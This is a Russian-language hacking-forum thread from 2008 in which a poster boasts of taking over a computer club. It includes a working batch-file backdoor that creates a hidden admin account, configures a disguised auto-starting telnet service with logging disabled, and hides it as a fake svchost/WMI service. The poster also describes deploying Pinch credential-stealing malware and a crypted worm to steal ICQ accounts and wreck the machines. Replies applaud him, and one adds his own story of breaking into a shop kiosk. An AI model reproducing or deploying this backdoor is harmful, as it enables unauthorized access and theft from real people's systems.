ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность

Ответ

Опции темы Поиск в этой теме Опции просмотра

Взлом компьютерного клуба.
Старый 13.08.2008, 16:15
m9chik
Познающий
Провел на форуме:
1129104

По умолчанию Взлом компьютерного клуба.

В этой статье я просто хочу расскать как я поимел компьюерный клуб.

Есть очень много вариантов взлома клуба,очень. сначало просто самые простые и самые палевные.

1.Вы можите принести usb флешку и сказать что тама находиться фотографии и т.д. или мне надо на неё скачать что либо,у нас в клубе это не прокатывало,такчто можно было получить пинка по голове.

2. Этот вариант впринципе такойже как и 1 токо в деле играют наушники, садишся за стол,двигаеш коробочку,помимо наушников встовляеш флэшку,но и это могут пропалить.

3.Можно тупо принести пинч на дискете админу и сказать "Ну чо зассал открыть?"
p.s. тута можно заранее давать драпу

Впринципе всё.

У нас в клубе когда он был была очень хорошая защита и очень палева было много потомучто стол админа находился по верх всех и выгледело примерно так.

Поясню может в других компьютерных клубах всё по другому но у нас строже,ничё не принес,заплатил сел,играй и лазий в инете.Также поставили недавненько защиту против всяких сайтов,хрен знает почему,но дейстовало эфективно,админ сразу вставал шол к компу и орал матом,потомучто ему заколебали всплывающие окошки

И так...
Был както день плохой,решил сходить в компы...
Тута я начал выберать места для своей коварной мысли поиметь эти сраные компы.
Выбрал "15" потомучто за "16" сидел толстый мужик,и меня не видно было бы,и так как сел немного порубал в игры и начал осматриваться что как...
Увидел что при переписки всего компьютерного клуба в qip сохроняеться в недры какихто странных папок,уже мысль была поднята что сеть кабельная доступ открыт для любому, начал дальше осматриваца я уже разочеровался,потомучто очень много тама нельзя было делать...
Поэтому я вспомнил след. win+R запуск программы,думал номер не пройдёт потомучто очень я боялся защиты... а тута как мёдом намазано вылетело окно след я вызвал Notepad и начал фигачить батник ...

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.re g
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer \Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client

Этопростенький бэк дор который пишеться за щиттаные минуты...

p.s. не думайте что я такой задрот просто у меня в контакте я хроню все батники такчто я просто скопировал и всё...

Потом была проблема куда мне загонять,и я решил туда куда валяються все эти логи icq и т.д. такмже я его и запустил.
Впринципе я уже мог щитать что компы уже мои но я хотел очень хорошо повеселиться
дальше я пошол домой решил приконектиться через telnet всё было ок особо в то время я сним не дружил поэтому дома залепил прикольчик+пинча+червя+(это т же бэкдор)токо .exe криптанул мне оч хороший человек всё, дальше я залил на рапиду и пошол на след день в компы,получилось так что сел за другой,но ничо я быстро зашол на рапиду скачал этот мой вирусик и запустил, дальше я играл играл и играл,кончилось моё время я пошол домой я знал что компьютеров уже нету поскольку поставил задержу,на след день ихние компы никак не работали издавали визг каспирского и время летело со скоростью света )))

p.s. + ещё был в том что у меня под конторелм было сразу 2 машини

p.s. я получил около 40 тупых 9 значек, 2 уродские 7значки,зато получил всё об админе

p.s. хочу выделить большую благодарность antichat.ru поскольку это был мой самый большой и экстримальный ход

Использованные темы:
Pinch
Крипт
бэкдор Сразу извеняюсь,поскольку мою тему на ачате удалили.
Кузя

Старый 13.08.2008, 16:25
~Real F@ck!~
Постоянный
Провел на форуме:
2382453

Отправить сообщение для ~Real F@ck!~ с помощью ICQ

Бля лольная история, еле осилил... всё гораздо проще и лучше.

Старый 13.08.2008, 18:29
OMG!!
Постоянный
Провел на форуме:
1073404

Да.. Митник нервно курит в сторонке )))) Молодец

Старый 13.08.2008, 18:55
ProTeuS
HARDstasy
Провел на форуме:
4226592

Отправить сообщение для ProTeuS с помощью ICQ

действительно о4ень экстремальный взлом

Старый 13.08.2008, 19:27
Dr.Bodja
Познающий
Провел на форуме:
338724

Есть метод намного проще, достаёшь из-за спины АК-47, наводишь на админа, и "Ану быстро пароли от асек давай".
ЗЫ: А Вебкилл наверно, таким способом тоже ламает интернет.

Старый 13.08.2008, 20:39
Sn@k3
Познавший АНТИЧАТ
Провел на форуме:
5151669

Отправить сообщение для Sn@k3 с помощью ICQ

Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.

Старый 13.08.2008, 20:48
m9chik
Познающий
Провел на форуме:
1129104

Цитата:
Сообщение от Sn@k3  
Опасен, я тоже как-то поимел два рядом стоящих комп клубов и один магазин, где компы стоят, правда там мне реально приходилось бежать))) еле ноги унес, магазин багира.
былобы интересно почитать как ты это зделал

Старый 13.08.2008, 21:23
slider
Members of Antichat - Level 5
Провел на форуме:
6520559

Имха.... слаюшка интересней описал :

http://forum.antichat.ru/showthread.php?p=169220

Старый 13.08.2008, 21:24
Sn@k3
Познавший АНТИЧАТ
Провел на форуме:
5151669

Отправить сообщение для Sn@k3 с помощью ICQ

Ну если интересно, то расскажу про багиру
Ну вообщем обычный магазин, каких полно, отдел продаж, гарантийный отдел и т.д. все в одном месте, только в разных помещениях, ну вообще зашел в отдел продаж, смотрю комп стоит, я впринцыпе знал что там есть комп, в котором есть электронный каталог, ну типа выбираешь что есть чего нет ит.д. за столом был один менеджер, лет ~21 а мне на то время было 17(счас 19), ну вообщем стал за комп, загородил спиной(случайно, но прально что так сделал), вообщем у компа нет клавы, процессор тоже спратан, один монитор и мышь, я тупо тыкаю смотрю девайсы, и т.д. смотрю ссылка на веб сайт, улыбнувшись ткнул по ней, и тут открывается, о чудо, осел, типа ИЕ. =))) немного поскрипев, я нажал на файл, далее открыть, после нгажал обзор а там снова "о чудо =)" вообщем далее я решил включить консоль что и сделал. Далее решил какой-нить фейс оставить, т.к. инета небыло никакх мыслей что даже локалка есть(как позже выяснилось) нет, ну вообщем решил тупо оставить фейс в файле =)(а мне больше и не надо было =) ), т.к. путь был типа
C:\docum....\root\раб... то я решил выйти назад, по частям скопировал прям в консоле "cd" и две точки с заголовка "............-2001." вставил, значит я, хотел перейти назад, но тут понил что без интера не обойтись =))))))))))) тут меня облом полный настал....

вообщем закрыл эту байду всю и зашел на диск С (опять браузером ), после создал файл мышкой и собрав хоть и на русском законный фейс путем копирования букв с разных папок, время было затрачено минут 15, так что я уже почти закончил, тут кароче подскакивает менеджер со словами, "Вам помочь?", я переполошился и испугался, не успев закрыть все это, пришлось свалить со словами, "да нет, спасибо".

Старый 13.08.2008, 21:28
BloodyMessage
Участник форума
Провел на форуме:
1074298

Отправить сообщение для BloodyMessage с помощью ICQ

m9chik, Почитал, вобще интересно, + за старания

Ответ